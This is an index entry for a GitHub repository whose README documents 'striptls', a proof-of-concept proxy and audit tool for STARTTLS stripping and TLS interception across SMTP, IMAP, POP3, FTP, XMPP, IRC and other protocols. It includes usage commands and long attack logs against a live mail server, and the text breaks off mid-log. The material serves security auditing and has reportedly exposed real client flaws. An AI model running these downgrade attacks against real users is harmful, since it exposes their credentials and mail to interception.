{"id":13775766,"url":"https://github.com/tintinweb/striptls","last_synced_at":"2025-09-03T01:36:03.570Z","repository":{"id":57471890,"uuid":"50688509","full_name":"tintinweb/striptls","owner":"tintinweb","description":"proxy poc implementation of STARTTLS stripping attacks","archived":false,"fork":false,"pushed_at":"2021-11-25T09:36:55.000Z","size":127,"stargazers_count":168,"open_issues_count":0,"forks_count":30,"subscribers_count":16,"default_branch":"master","last_synced_at":"2025-08-19T02:23:09.870Z","etag":null,"topics":["interception","man-in-the-middle","mitm","security","security-audit","starttls","striptls","tcp-proxy","tls"],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"cc0-1.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/tintinweb.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2016-01-29T20:13:35.000Z","updated_at":"2025-08-01T20:35:38.000Z","dependencies_parsed_at":"2022-08-30T15:20:22.471Z","dependency_job_id":null,"html_url":"https://github.com/tintinweb/striptls","commit_stats":null,"previous_names":[],"tags_count":5,"template":false,"template_full_name":null,"purl":"pkg:github/tintinweb/striptls","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tintinweb%2Fstriptls","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tintinweb%2Fstriptls/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tintinweb%2Fstriptls/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tintinweb%2Fstriptls/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/tintinweb","download_url":"https://codeload.github.com/tintinweb/striptls/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tintinweb%2Fstriptls/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":273377143,"owners_count":25094525,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-09-02T02:00:09.530Z","response_time":77,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["interception","man-in-the-middle","mitm","security","security-audit","starttls","striptls","tcp-proxy","tls"],"created_at":"2024-08-03T17:01:48.995Z","updated_at":"2025-09-03T01:36:03.541Z","avatar_url":"https://github.com/tintinweb.png","language":"Python","funding_links":[],"categories":["\u003ca id=\"d03d494700077f6a65092985c06bf8e8\"\u003e\u003c/a\u003e工具"],"sub_categories":["\u003ca id=\"0ff94312f3ab4898f5996725133ea9d1\"\u003e\u003c/a\u003e未分类"],"readme":"![image](https://user-images.githubusercontent.com/2865694/143416063-b22e65a4-4005-453b-88d1-5477de56fdc4.png)\n\n\n# striptls - auditing proxy\n#### poc implementation of STARTTLS stripping attacks\n\nA generic tcp proxy implementation and **audit tool** to perform **protocol independent** `ssl/tls` interception and `STARTTLS` stripping attacks on `SMTP`, `POP3`, `IMAP`, `FTP`, `NNTP`, `XMPP`, `ACAP` and `IRC`.\n\n**Python2!**\n\n##### :trophy: Trophies\n\n* CVE-2016-0772 - [python: smtplib](https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-0772)\n* CVE-2016-10027 - [Smack XMPP library](https://twitter.com/sylv1_secu/status/817305746828361728)\n\n\u003csub\u003e//Discovered a vulnerability with the help of this project? Drop me a line!\u003c/sub\u003e\n\n###### Requires: \n * Python \u003e= 2.7.9 (`SSLContext`) \u003c Python 3\n * (optional for tls interception) Certificate and PrivateKey in PEM format (single file) `--key=server.pem`\n\n#### Vectors\n\n* GENERIC\n * Intercept - protocol independent ssl/tls interception. peeks for TLS Handshake, converts socket to tls (tls-to-tls proxy)\n * InboundIntercept - protocol independent ssl/tls interception for the inbound channel only (tls-to-plain proxy)\n* SMTP\n * SMTP.StripFromCapabilities - server response capability patch\n * SMTP.StripWithInvalidResponseCode - client STARTTLS stripping, invalid response code\n * SMTP.UntrustedIntercept - STARTTLS interception (client and server talking ssl) (requires server.pem in pwd)\n * SMTP.StripWithTemporaryError\n * SMTP.StripWithError\n * SMTP.ProtocolDowngradeStripExtendedMode\n * SMTP.InjectCommand\n * SMTP.InboundStarttlsProxy - (starttls-to-plain proxy)\n* POP3 \n * POP3.StripFromCapabilities\n * POP3.StripWithError\n * POP3.UntrustedIntercept\n* IMAP \n * IMAP.StripFromCapabilities\n * IMAP.StripWithError\n * IMAP.UntrustedIntercept\n * IMAP.ProtocolDowngradeToV2\n* FTP\n * FTP.StripFromCapabilities\n * FTP.StripWithError\n * FTP.UntrustedIntercept\n* NNTP\n * NNTP.StripFromCapabilities \n * NNTP.StripWithError\n * NNTP.UntrustedIntercept\n* XMPP\n * XMPP.StripFromCapabilities\n * XMPP.StripInboundTLS\n * XMPP.UntrustedIntercept\n* ACAP (untested)\n * ACAP.StripFromCapabilities \n * ACAP.StripWithError\n * ACAP.UntrustedIntercept\n* IRC\n * IRC.StripFromCapabilities\n * IRC.StripWithError\n * IRC.UntrustedIntercept\n * IRC.StripWithNotRegistered\n * IRC.StripCAPWithNotregistered\n * IRC.StripWithSilentDrop\n\nResults:\n\n```python\n- [*] client: 127.0.0.1\n- [Vulnerable!] \u003cclass striptls.StripWithInvalidResponseCode at 0xffd3138c\u003e\n- [Vulnerable!] \u003cclass striptls.StripWithTemporaryError at 0xffd4611c\u003e\n- [ ] \u003cclass striptls.StripFromCapabilities at 0xffd316bc\u003e\n- [Vulnerable!] \u003cclass striptls.StripWithError at 0xffd4614c\u003e\n- [*] client: 192.168.139.1\n- [Vulnerable!] \u003cclass striptls.StripInboundTLS at 0x7f08319a6808\u003e\n- [Vulnerable!] \u003cclass striptls.StripFromCapabilities at 0x7f08319a67a0\u003e\n- [Vulnerable!] \u003cclass striptls.UntrustedIntercept at 0x7f08319a6870\u003e\n```\n\n## Usage\n\n```\n#\u003e python2 -m pip install striptls\n#\u003e python2 -m striptls --help\n```\n\n```\n#\u003e python -m striptls --help # from pip/setup.py\n#\u003e python striptls --help # from source / root folder\nUsage: striptls.py [options]\n\n example: striptls.py --listen 0.0.0.0:25 --remote mail.server.tld:25\n\n\nOptions:\n -h, --help show this help message and exit\n -q, --quiet be quiet [default: True]\n -l LISTEN, --listen=LISTEN\n listen ip:port [default: 0.0.0.0:\u003cremote_port\u003e]\n -r REMOTE, --remote=REMOTE\n remote target ip:port to forward sessions to\n -k KEY, --key=KEY SSL Certificate and Private key file to use, PEM\n format assumed [default: server.pem]\n -s, --generic-ssl-intercept\n dynamically intercept SSL/TLS\n -b BUFFER_SIZE, --bufsiz=BUFFER_SIZE\n -x VECTORS, --vectors=VECTORS\n Comma separated list of vectors. Use 'ALL' (default)\n to select all vectors, 'NONE' for tcp/ssl proxy mode.\n Available vectors: ACAP.StripFromCapabilities,\n ACAP.StripWithError, ACAP.UntrustedIntercept,\n FTP.StripFromCapabilities, FTP.StripWithError,\n FTP.UntrustedIntercept, GENERIC.Intercept,\n IMAP.ProtocolDowngradeToV2,\n IMAP.StripFromCapabilities, IMAP.StripWithError,\n IMAP.UntrustedIntercept,\n IRC.StripCAPWithNotRegistered,\n IRC.StripFromCapabilities, IRC.StripWithError,\n IRC.StripWithNotRegistered, IRC.StripWithSilentDrop,\n IRC.UntrustedIntercept, NNTP.StripFromCapabilities,\n NNTP.StripWithError, NNTP.UntrustedIntercept,\n POP3.StripFromCapabilities, POP3.StripWithError,\n POP3.UntrustedIntercept, SMTP.InboundStarttlsProxy,\n SMTP.InjectCommand,\n SMTP.ProtocolDowngradeStripExtendedMode,\n SMTP.StripFromCapabilities, SMTP.StripWithError,\n SMTP.StripWithInvalidResponseCode,\n SMTP.StripWithTemporaryError, SMTP.UntrustedIntercept,\n XMPP.StripFromCapabilities, XMPP.StripInboundTLS,\n XMPP.UntrustedIntercept [default: ALL]\n```\n\n## Install (optional)\n\nfrom pip\n\n #\u003e pip install striptls\n\nfrom source\n\n #\u003e setup.py install\n\n## Examples\n\n\t inbound outbound\n\t[inbound_peer]\u003c-------------\u003e[listen:proxy]\u003c-------------\u003e[outbound_peer/target]\n\t smtp-client striptls remote/target\n\t \nlocal `smtp-client` -\u003e `localhost:8825` (proxy) -\u003e `mail.gmx.net:25`\n\n### Generic SSL/TLS Interception\n\t\n`--generic-ssl-intercept` is a global switch to enable generic ssl/tls handshake\ndetection and session conversion. Can be combined with any mangle/vector.\n\n`GENERIC.Intercept` is a mangle/vector implementation of the ssl/tls handshake\ndetect and convert feature.\n\n\t# python striptls.py -l 0.0.0.0:9999 -r mail.gmx.com:465 -x GENERIC.Intercept\n\t- INFO - \u003cProxy 0x1fdcf50 listen=('0.0.0.0', 9999) target=('mail.gmx.com', 465)\u003e ready.\n\t- DEBUG - * added vector (port:None , proto: GENERIC): \u003cclass __main__.Intercept at 0x0218AAB0\u003e\n\t- INFO - \u003cRewriteDispatcher ssl/tls_intercept=False vectors={None: set([\u003cclass __main__.Intercept at 0x0218AAB0\u003e])}\u003e\n\t- INFO - \u003cSession 0x1ff00b0\u003e client ('127.0.0.1', 8228) has connected\n\t- INFO - \u003cSession 0x1ff00b0\u003e connecting to target ('mail.gmx.com', 465)\n\t- DEBUG - \u003cRewriteDispatcher - changed mangle: __main__.Intercept new: True\u003e\n\t- INFO - ProtocolDetect: SSL/TLS version: TLS_1_0\n\t- INFO - SSL Handshake detected - performing ssl/tls conversion\n\t- DEBUG - \u003cSession 0x1ff00b0\u003e [client] \u003c\u003e [ ] SSL handshake done: ('ECDHE-RSA-AES256-GCM-SHA384', 'TLSv1/SSLv3', 256)\n\t- DEBUG - \u003cSession 0x1ff00b0\u003e [ ] \u003c\u003e [server] SSL handshake done: ('DHE-RSA-AES256-GCM-SHA384', 'TLSv1/SSLv3', 256)\n\t- DEBUG - \u003cSession 0x1ff00b0\u003e [client] \u003c= [server] '220 gmx.com (mrgmx101) Nemesis ESMTP Service ready\\r\\n'\n\t- DEBUG - \u003cSession 0x1ff00b0\u003e [client] =\u003e [server] 'hi\\r\\n'\n\t- DEBUG - \u003cSession 0x1ff00b0\u003e [client] \u003c= [server] '500 Syntax error, command unrecognized\\r\\n'\n\t\n\t# python striptls.py -l 0.0.0.0:9999 -r mail.gmx.com:25 -x NONE --generic-ssl-intercept\n\t- INFO - \u003cProxy 0x1efbf70 listen=('0.0.0.0', 9999) target=('mail.gmx.com', 25)\u003e ready.\n\t- INFO - \u003cRewriteDispatcher ssl/tls_intercept=True vectors={}\u003e\n\t- DEBUG - \u003cProtocolDetect 0x1f21b70 protocol_id=PROTO_SMTP len_history=0\u003e - protocol detected (target port)\n\t- INFO - \u003cSession 0x1f10110\u003e client ('127.0.0.1', 8290) has connected\n\t- INFO - \u003cSession 0x1f10110\u003e connecting to target ('mail.gmx.com', 25)\n\t- DEBUG - \u003cSession 0x1f10110\u003e [client] \u003c= [server] '220 gmx.com (mrgmx101) Nemesis ESMTP Service ready\\r\\n'\n\t- DEBUG - \u003cSession 0x1f10110\u003e [client] =\u003e [server] 'EHLO openssl.client.net\\r\\n'\n\t- DEBUG - \u003cSession 0x1f10110\u003e [client] \u003c= [server] '250-gmx.com Hello openssl.client.net [xxx.xxx.xxx.xxx]\\r\\n250-SIZE 31457280\\r\\n250-AUTH LOGIN PLAIN\\r\\n250 STARTTLS\\r\\n'\n\t- DEBUG - \u003cSession 0x1f10110\u003e [client] =\u003e [server] 'STARTTLS\\r\\n'\n\t- DEBUG - \u003cSession 0x1f10110\u003e [client] \u003c= [server] '220 OK\\r\\n'\n\t- INFO - ProtocolDetect: SSL/TLS version: TLS_1_0\n\t- INFO - SSL Handshake detected - performing ssl/tls conversion\n\t- DEBUG - \u003cSession 0x1f10110\u003e [client] \u003c\u003e [ ] SSL handshake done: ('ECDHE-RSA-AES256-GCM-SHA384', 'TLSv1/SSLv3', 256)\n\t- DEBUG - \u003cSession 0x1f10110\u003e [ ] \u003c\u003e [server] SSL handshake done: ('DHE-RSA-AES256-GCM-SHA384', 'TLSv1/SSLv3', 256)\n\t- DEBUG - \u003cSession 0x1f10110\u003e [client] =\u003e [server] 'EHLO A\\r\\n'\n\t- DEBUG - \u003cSession 0x1f10110\u003e [client] \u003c= [server] '250-gmx.com Hello A [xxx.xxx.xxx.xxx]\\r\\n250-SIZE 69920427\\r\\n250AUTH LOGIN PLAIN\\r\\n'\n\n### Audit Mode\n\niterates all protocol specific cases on a per client basis and keeps track of clients violating the starttls protocol. Ctrl+C to abort audit and print results.\n\n\t#\u003e python striptls --listen localhost:8825 --remote=mail.gmx.net:25\n\t- INFO - \u003cProxy 0xffcf6d0cL listen=('localhost', 8825) target=('mail.gmx.net', 25)\u003e ready.\n\t- DEBUG - * added test (port:21 , proto: FTP): \u003cclass striptls.StripFromCapabilities at 0xffd4632c\u003e\n\t- DEBUG - * added test (port:21 , proto: FTP): \u003cclass striptls.StripWithError at 0xffd4635c\u003e\n\t- DEBUG - * added test (port:21 , proto: FTP): \u003cclass striptls.UntrustedIntercept at 0xffd4638c\u003e\n\t- DEBUG - * added test (port:143 , proto: IMAP): \u003cclass striptls.StripFromCapabilities at 0xffd4626c\u003e\n\t- DEBUG - * added test (port:143 , proto: IMAP): \u003cclass striptls.StripWithError at 0xffd4629c\u003e\n\t- DEBUG - * added test (port:143 , proto: IMAP): \u003cclass striptls.UntrustedIntercept at 0xffd462cc\u003e\n\t- DEBUG - * added test (port:119 , proto: NNTP): \u003cclass striptls.StripFromCapabilities at 0xffd463ec\u003e\n\t- DEBUG - * added test (port:119 , proto: NNTP): \u003cclass striptls.StripWithError at 0xffd4641c\u003e\n\t- DEBUG - * added test (port:119 , proto: NNTP): \u003cclass striptls.UntrustedIntercept at 0xffd4644c\u003e\n\t- DEBUG - * added test (port:110 , proto: POP3): \u003cclass striptls.StripWithError at 0xffd461dc\u003e\n\t- DEBUG - * added test (port:110 , proto: POP3): \u003cclass striptls.UntrustedIntercept at 0xffd4620c\u003e\n\t- DEBUG - * added test (port:25 , proto: SMTP): \u003cclass striptls.StripFromCapabilities at 0xffd316bc\u003e\n\t- DEBUG - * added test (port:25 , proto: SMTP): \u003cclass striptls.StripWithError at 0xffd4614c\u003e\n\t- DEBUG - * added test (port:25 , proto: SMTP): \u003cclass striptls.StripWithInvalidResponseCode at 0xffd3138c\u003e\n\t- DEBUG - * added test (port:25 , proto: SMTP): \u003cclass striptls.StripWithTemporaryError at 0xffd4611c\u003e\n\t- DEBUG - * added test (port:25 , proto: SMTP): \u003cclass striptls.UntrustedIntercept at 0xffd4617c\u003e\n\t- DEBUG - * added test (port:5222 , proto: XMPP): \u003cclass striptls.StripFromCapabilities at 0xffd464ac\u003e\n\t- INFO - \u003cRewriteDispatcher vectors={5222: set([\u003cclass striptls.StripFromCapabilities at 0xffd464ac\u003e]), 110: set([\u003cclass striptls.UntrustedIntercept at 0xffd4620c\u003e, \u003cclass striptls.StripWithError at 0xffd461dc\u003e]), 143: set([\u003cclass striptls.StripWithError at 0xffd4629c\u003e, \u003cclass striptls.UntrustedIntercept at 0xffd462cc\u003e, \u003cclass striptls.StripFromCapabilities at 0xffd4626c\u003e]), 21: set([\u003cclass striptls.UntrustedIntercept at 0xffd4638c\u003e, \u003cclass striptls.StripFromCapabilities at 0xffd4632c\u003e, \u003cclass striptls.StripWithError at 0xffd4635c\u003e]), 119: set([\u003cclass striptls.StripWithError at 0xffd4641c\u003e, \u003cclass striptls.UntrustedIntercept at 0xffd4644c\u003e, \u003cclass striptls.StripFromCapabilities at 0xffd463ec\u003e]), 25: set([\u003cclass striptls.StripWithInvalidResponseCode at 0xffd3138c\u003e, \u003cclass striptls.StripWithTemporaryError at 0xffd4611c\u003e, \u003cclass striptls.StripFromCapabilities at 0xffd316bc\u003e, \u003cclass striptls.StripWithError at 0xffd4614c\u003e, \u003cclass striptls.UntrustedIntercept at 0xffd4617c\u003e])}\u003e\n\t- DEBUG - \u003cProtocolDetect 0xffcf6eccL protocol_id=PROTO_SMTP len_history=0\u003e - protocol detected (target port)\n\t- INFO - \u003cSession 0xffcf6e4cL\u003e client ('127.0.0.1', 28902) has connected\n\t- INFO - \u003cSession 0xffcf6e4cL\u003e connecting to target ('mail.gmx.net', 25)\n\t- DEBUG - \u003cSession 0xffcf6e4cL\u003e [client] \u003c= [server] '220 gmx.com (mrgmx001) Nemesis ESMTP Service ready\\r\\n'\n\t- DEBUG - \u003cRewriteDispatcher - changed mangle: striptls.StripWithInvalidResponseCode new: True\u003e\n\t- DEBUG - \u003cSession 0xffcf6e4cL\u003e [client] =\u003e [server] 'ehlo [192.168.139.1]\\r\\n'\n\t- DEBUG - \u003cSession 0xffcf6e4cL\u003e [client] \u003c= [server] '250-gmx.com Hello [192.168.139.1] [xxx.xxx.xxx.xxx]\\r\\n250-SIZE 31457280\\r\\n250-AUTH LOGIN PLAIN\\r\\n250 STARTTLS\\r\\n'\n\t- DEBUG - \u003cSession 0xffcf6e4cL\u003e [client] \u003c= [server][mangled] '250-gmx.com Hello [192.168.139.1] [xxx.xxx.xxx.xxx]\\r\\n250-SIZE 31457280\\r\\n250-AUTH LOGIN PLAIN\\r\\n250-STARTTLS\\r\\n250 STARTTLS\\r\\n'\n\t- DEBUG - \u003cSession 0xffcf6e4cL\u003e [client] =\u003e [server] 'STARTTLS\\r\\n'\n\t- DEBUG - \u003cSession 0xffcf6e4cL\u003e [client] \u003c= [server][mangled] '200 STRIPTLS\\r\\n'\n\t- DEBUG - \u003cSession 0xffcf6e4cL\u003e [client] =\u003e [server][mangled] None\n\t- DEBUG - \u003cSession 0xffcf6e4cL\u003e [client] =\u003e [server] 'mail FROM:\u003ca@b.com\u003e size=10\\r\\n'\n\t- DEBUG - \u003cSession 0xffcf6e4cL\u003e [client] \u003c= [server] '530 Authentication required\\r\\n'\n\t- DEBUG - \u003cSession 0xffcf6e4cL\u003e [client] =\u003e [server] 'rset\\r\\n'\n\t- DEBUG - \u003cSession 0xffcf6e4cL\u003e [client] \u003c= [server] '250 OK\\r\\n'\n\t- WARNING - \u003cSession 0xffcf6e4cL\u003e terminated.\n\t- DEBUG - \u003cProtocolDetect 0xffd0920cL protocol_id=PROTO_SMTP len_history=0\u003e - protocol detected (target port)\n\t- INFO - \u003cSession 0xffd0918cL\u003e client ('127.0.0.1', 28905) has connected\n\t- INFO - \u003cSession 0xffd0918cL\u003e connecting to target ('mail.gmx.net', 25)\n\t- DEBUG - \u003cSession 0xffd0918cL\u003e [client] \u003c= [server] '220 gmx.com (mrgmx003) Nemesis ESMTP Service ready\\r\\n'\n\t- DEBUG - \u003cRewriteDispatcher - changed mangle: striptls.StripWithTemporaryError new: True\u003e\n\t- DEBUG - \u003cSession 0xffd0918cL\u003e [client] =\u003e [server] 'ehlo [192.168.139.1]\\r\\n'\n\t- DEBUG - \u003cSession 0xffd0918cL\u003e [client] \u003c= [server] '250-gmx.com Hello [192.168.139.1] [xxx.xxx.xxx.xxx]\\r\\n250-SIZE 31457280\\r\\n250-AUTH LOGIN PLAIN\\r\\n250 STARTTLS\\r\\n'\n\t- DEBUG - \u003cSession 0xffd0918cL\u003e [client] =\u003e [server] 'STARTTLS\\r\\n'\n\t- DEBUG - \u003cSession 0xffd0918cL\u003e [client] \u003c= [server][mangled] '454 TLS not available due to temporary reason\\r\\n'\n\t- DEBUG - \u003cSession 0xffd0918cL\u003e [client] =\u003e [server][mangled] None\n\t- DEBUG - \u003cSession 0xffd0918cL\u003e [client] =\u003e [server] 'mail FROM:\u003ca@b.com\u003e size=10\\r\\n'\n\t- DEBUG - \u003cSession 0xffd0918cL\u003e [client] \u003c= [server] '530 Authentication required\\r\\n'\n\t- DEBUG - \u003cSession 0xffd0918cL\u003e [client] =\u003e [server] 'rset\\r\\n'\n\t- DEBUG - \u003cSession 0xffd0918cL\u003e [client] \u003c= [server] '250 OK\\r\\n'\n\t- WARNING - \u003cSession 0xffd0918cL\u003e terminated.\n\t- DEBUG - \u003cProtocolDetect 0xffd092ecL protocol_id=PROTO_SMTP len_history=0\u003e - protocol detected (target port)\n\t- INFO - \u003cSession 0xffd0926cL\u003e client ('127.0.0.1', 28908) has connected\n\t- INFO - \u003cSession 0xffd0926cL\u003e connecting to target ('mail.gmx.net', 25)\n\t- DEBUG - \u003cSession 0xffd0926cL\u003e [client] \u003c= [server] '220 gmx.com (mrgmx003) Nemesis ESMTP Service ready\\r\\n'\n\t- DEBUG - \u003cRewriteDispatcher - changed mangle: striptls.StripFromCapabilities new: True\u003e\n\t- DEBUG - \u003cSession 0xffd0926cL\u003e [client] =\u003e [server] 'ehlo [192.168.139.1]\\r\\n'\n\t- DEBUG - \u003cSession 0xffd0926cL\u003e [client] \u003c= [server] '250-gmx.com Hello [192.168.139.1] [xxx.xxx.xxx.xxx]\\r\\n250-SIZE 31457280\\r\\n250-AUTH LOGIN PLAIN\\r\\n250 STARTTLS\\r\\n'\n\t- DEBUG - \u003cSession 0xffd0926cL\u003e [client] \u003c= [server][mangled] '250-gmx.com Hello [192.168.139.1] [xxx.xxx.xxx.xxx]\\r\\n250-SIZE 31457280\\r\\n250 AUTH LOGIN PLAIN\\r\\n'\n\t- WARNING - \u003cSession 0xffd0926cL\u003e terminated.\n\t- DEBUG - \u003cProtocolDetect 0xffd093ccL protocol_id=PROTO_SMTP len_history=0\u003e - protocol detected (target port)\n\t- INFO - \u003cSession 0xffd0934cL\u003e client ('127.0.0.1', 28911) has connected\n\t- INFO - \u003cSession 0xffd0934cL\u003e connecting to target ('mail.gmx.net', 25)\n\t- DEBUG - \u003cSession 0xffd0934cL\u003e [client] \u003c= [server] '220 gmx.com (mrgmx002) Nemesis ESMTP Service ready\\r\\n'\n\t- DEBUG - \u003cRewriteDispatcher - changed mangle: striptls.StripWithError new: True\u003e\n\t- DEBUG - \u003cSession 0xffd0934cL\u003e [client] =\u003e [server] 'ehlo [192.168.139.1]\\r\\n'\n\t- DEBUG - \u003cSession 0xffd0934cL\u003e [client] \u003c= [server] '250-gmx.com Hello [192.168.139.1] [xxx.xxx.xxx.xxx]\\r\\n250-SIZE 31457280\\r\\n250-AUTH LOGIN PLAIN\\r\\n250 STARTTLS\\r\\n'\n\t- DEBUG - \u003cSession 0xffd0934cL\u003e [client] =\u003e [server] 'STARTTLS\\r\\n'\n\t- DEBUG - \u003cSession 0xffd0934cL\u003e [client] \u003c= [server][mangled] '501 Syntax error\\r\\n'\n\t- DEBUG - \u003cSession 0xffd0934cL\u003e [client] =\u003e [server][mangled] None\n\t- DEBUG - \u003cSession 0xffd0934cL\u003e [client] =\u003e [server] 'mail FROM:\u003ca@b.com\u003e size=10\\r\\n'\n\t- DEBUG - \u003cSession 0xffd0934cL\u003e [client] \u003c= [server] '530 Authentication required\\r\\n'\n\t- DEBUG - \u003cSession 0xffd0934cL\u003e [client] =\u003e [server] 'rset\\r\\n'\n\t- DEBUG - \u003cSession 0xffd0934cL\u003e [client] \u003c= [server] '250 OK\\r\\n'\n\t- WARNING - \u003cSession 0xffd0934cL\u003e terminated.\n\t- WARNING - Ctrl C - Stopping server\n\t- INFO - -- audit results --\n\t- INFO - [*] client: 127.0.0.1\n\t- INFO - [Vulnerable!] \u003cclass striptls.StripWithInvalidResponseCode at 0xffd3138c\u003e\n\t- INFO - [Vulnerable!] \u003cclass striptls.StripWithTemporaryError at 0xffd4611c\u003e\n\t- INFO - [ ] \u003cclass striptls.StripFromCapabilities at 0xffd316bc\u003e\n\t- INFO - [Vulnerable!] \u003cclass striptls.StripWithError at 0xffd4614c\u003e\n\n\n### Strip STARTTLS from server capabilities\n\n\t#\u003e python striptls --listen=localhost:8825 --remote=mail.gmx.net:25 --test=SMTP.StripFromCapabilities\n\t- INFO - \u003cProxy 0x1fe6e70 listen=('localhost', 8825) target=('mail.gmx.net', 25)\u003e ready.\n\t- INFO - \u003cRewriteDispatcher attacks={25: set([\u003cclass __main__.StripFromCapabilities at 0x01FE77D8\u003e])}\u003e\n\t- DEBUG - \u003cProtocolDetect 0x1fe6f90 is_protocol=PROTO_SMTP len_history=0\u003e - protocol detected (target port)\n\t- INFO - \u003cSession 0x1fe6f10\u003e client ('127.0.0.1', 20070) has connected\n\t- INFO - \u003cSession 0x1fe6f10\u003e connecting to target ('mail.gmx.net', 25)\n\t- DEBUG - \u003cSession 0x1fe6f10\u003e [client] \u003c= [server] '220 gmx.com (mrgmx003) Nemesis ESMTP Service ready\\r\\n'\n\t- DEBUG - \u003cSession 0x1fe6f10\u003e [client] =\u003e [server] 'ehlo [192.168.139.1]\\r\\n'\n\t- DEBUG - \u003cSession 0x1fe6f10\u003e [client] \u003c= [server] '250-gmx.com Hello [192.168.139.1] [xxx.xxx.xxx.xxx]\\r\\n250-SIZE 31457280\\r\\n250-AUTH LOGIN PLAIN\\r\\n250 STARTTLS\\r\\n'\n\t- DEBUG - \u003cSession 0x1fe6f10\u003e [client] \u003c= [server][mangled] '250-gmx.com Hello [192.168.139.1] [xxx.xxx.xxx.xxx]\\r\\n250-SIZE 31457280\\r\\n250 AUTH LOGIN PLAIN\\r\\n'\n\t- DEBUG - \u003cSession 0x1fe6f10\u003e [client] =\u003e [server] 'mail FROM:\u003ca@b.com\u003e size=10\\r\\n'\n\t- DEBUG - \u003cSession 0x1fe6f10\u003e [client] \u003c= [server] '530 Authentication required\\r\\n'\n\t- DEBUG - \u003cSession 0x1fe6f10\u003e [client] =\u003e [server] 'rset\\r\\n'\n\t- DEBUG - \u003cSession 0x1fe6f10\u003e [client] \u003c= [server] '250 OK\\r\\n'\n\t- WARNING - \u003cSession 0x1fe6f10\u003e terminated.\n\n### Invalid STARTTLS response code\n\n\t#\u003e python striptls --listen=localhost:8825 --remote=mail.gmx.net:25 --test=SMTP.StripWithInvalidResponseCode\n\t- INFO - \u003cProxy 0x1fefe70 listen=('localhost', 8825) target=('mail.gmx.net', 25)\u003e ready.\n\t- INFO - \u003cRewriteDispatcher attacks={25: set([\u003cclass __main__.StripWithInvalidResponseCode at 0x02010730\u003e])}\u003e\n\t- DEBUG - \u003cProtocolDetect 0x1feff90 is_protocol=PROTO_SMTP len_history=0\u003e - protocol detected (target port)\n\t- INFO - \u003cSession 0x1feff10\u003e client ('127.0.0.1', 20061) has connected\n\t- INFO - \u003cSession 0x1feff10\u003e connecting to target ('mail.gmx.net', 25)\n\t- DEBUG - \u003cSession 0x1feff10\u003e [client] \u003c= [server] '220 gmx.com (mrgmx003) Nemesis ESMTP Service ready\\r\\n'\n\t- DEBUG - \u003cSession 0x1feff10\u003e [client] =\u003e [server] 'ehlo [192.168.139.1]\\r\\n'\n\t- DEBUG - \u003cSession 0x1feff10\u003e [client] \u003c= [server] '250-gmx.com Hello [192.168.139.1] [xxx.xxx.xxx.xxx]\\r\\n250-SIZE 31457280\\r\\n250-AUTH LOGIN PLAIN\\r\\n250 STARTTLS\\r\\n'\n\t- DEBUG - \u003cSession 0x1feff10\u003e [client] \u003c= [server][mangled] '250-gmx.com Hello [192.168.139.1] [xxx.xxx.xxx.xxx]\\r\\n250-SIZE 31457280\\r\\n250-AUTH LOGIN PLAIN\\r\\n250-STARTTLS\\r\\n250 STARTTLS\\r\\n'\n\t- DEBUG - \u003cSession 0x1feff10\u003e [client] =\u003e [server] 'STARTTLS\\r\\n'\n\t- DEBUG - \u003cSession 0x1feff10\u003e [client] \u003c= [server][mangled] '200 STRIPTLS\\r\\n'\n\t- DEBUG - \u003cSession 0x1feff10\u003e [client] =\u003e [server][mangled] None\n\t- DEBUG - \u003cSession 0x1feff10\u003e [client] =\u003e [server] 'mail FROM:\u003ca@b.com\u003e size=10\\r\\n'\n\t- DEBUG - \u003cSession 0x1feff10\u003e [client] \u003c= [server] '530 Authentication required\\r\\n'\n\t- DEBUG - \u003cSession 0x1feff10\u003e [client] =\u003e [server] 'rset\\r\\n'\n\t- DEBUG - \u003cSession 0x1feff10\u003e [client] \u003c= [server] '250 OK\\r\\n'\n\t- WARNING - \u003cSession 0x1feff10\u003e terminated.\n\n\n### Untrusted SSL Intercept (for clients not checking server cert trust)\n\n\t#\u003e python striptls --listen=localhost:8825 --remote=mail.gmx.net:25 --test=SMTP.UntrustedIntercept\n\t- INFO - \u003cProxy 0x1f468f0 listen=('localhost', 8825) target=('mail.gmx.net', 25)\u003e ready.\n\t- INFO - \u003cRewriteDispatcher attacks={25: set([\u003cclass __main__.UntrustedIntercept at 0x01F45298\u003e])}\u003e\n\t- DEBUG - \u003cProtocolDetect 0x1f46a10 protocol_id=PROTO_SMTP len_history=0\u003e - protocol detected (target port)\n\t- INFO - \u003cSession 0x1f46990\u003e client ('127.0.0.1', 20238) has connected\n\t- INFO - \u003cSession 0x1f46990\u003e connecting to target ('mail.gmx.net', 25)\n\t- DEBUG - \u003cSession 0x1f46990\u003e [client] \u003c= [server] '220 gmx.com (mrgmx002) Nemesis ESMTP Service ready\\r\\n'\n\t- DEBUG - \u003cSession 0x1f46990\u003e [client] =\u003e [server] 'ehlo [192.168.139.1]\\r\\n'\n\t- DEBUG - \u003cSession 0x1f46990\u003e [client] \u003c= [server] '250-gmx.com Hello [192.168.139.1] 